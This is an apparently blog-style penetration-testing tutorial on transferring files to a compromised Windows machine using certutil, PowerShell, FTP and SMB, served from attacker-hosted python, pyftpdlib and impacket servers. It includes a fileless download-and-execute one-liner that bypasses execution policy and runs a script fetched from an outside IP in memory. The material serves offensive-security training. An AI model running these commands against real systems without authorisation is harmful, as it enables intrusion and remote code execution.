Part of penetration testing (post-exploitation) requires you to transfer files from your machine to the target machine. Here are some commands we can use to download files in windows.

HTTP

1. Set up a Web Server

  • python3 -m http.server 8888
  • python2.7 -m SimpleHTTPServer 8888

2. We will transfer a file named VK9-Sec.jpg

CertUtil

1. In CMD you can run to download files

  • certutil -urlcache -split -f “http://ip-addr:port/file” [output-file]
  • certutil -urlcache -split -f “http://192.168.0.13:8888/VK9-Sec.jpg” VK9-Sec.jpg
  • dir VK9-Sec.jpg

PowerShell (IWR)

  • IWR http://192.168.0.13:8888/VK9-Sec.jpg -OutFile VK9-Sec.jpg
  • dir VK9-Sec.jpg

2. It can also be run from CMD

  • powershell.exe IWR http://192.168.0.13:8888/VK9-Sec.jpg -OutFile VK9-Sec.jpg
  • dir VK9-Sec.jpg

Powershell (Invoke-WebRequest)

  • Invoke-WebRequest -URI ‘http://192.168.0.13:8888/VK9-Sec.jpg ‘ -Outfile .\VK9-Sec.jpg
  • dir VK9-Sec.jpg

2. This can also be run from CMD

  • powershell.exe Invoke-WebRequest -URI ‘http://192.168.0.13:8888/VK9-Sec.jpg’ -Outfile .\VK9-Sec.jpg
  • dir VK9-Sec.jpg

Fileless download

We can download and execute from memory using Powershell.

1. First we will set up a web server containing Sherlock.ps1 to execute as a test

  • git clone https://github.com/rasta-mouse/Sherlock.git
  • cd Sherlock
  • python3.9 -m http.server 9999

2. In the remote machine you have to execute

Powershell

  • powershell -ep bypass
  • IEX(New-Object Net.WebClient).DownloadString(‘http://192.168.0.16:8888/Sherlock.ps1’);Find-AllVulns

CMD

  • powershell.exe “iex(new-object net.webclient).downloadString(‘http://192.168.0.16:8888/Sherlock.ps1’);Find-AllVulns”

FTP

Pyftpdlib Python library

FTP is another common method of file transfer, and FTP clients are usually installed by default on Windows machines.

1. Install in your local linux server the python library for setting up the FTP server, (you can run it without sudo as well)

  • sudo pip3 install pyftpdlib
  • sudo python3 -m pyftpdlib -p 21

2. From the remote Windows machine we can connect using FTP.

  • Open 192.168.0.16
  • User: anonymous
  • Password: anonymous

3. As we logged in successfully, we can run FTP commands to inspect the files in the directories and download it into our machine

  • HELP
  • dir
  • GET VK9-Sec.jpg

Note as you can see the transfer completed. If we actually check our directory, we will see the file downloaded

  • dir

SMB

We can also use the SMB protocol to transfer files.

1. Start a SMB server in Kali

  • impacket-smbserver EVILSHARE ~/Desktop -smb2support

2. From the remote machine connect to the SMB server we just set up, we can see our share “EVILSHARE”

  • net view \\192.168.0.13

3. List the files in the share

  • dir \\192.168.0.13\EVILSHARE

3. Download into the remote server

  • copy \\192.168.0.13\EVILSHARE\VK9-Sec.jpg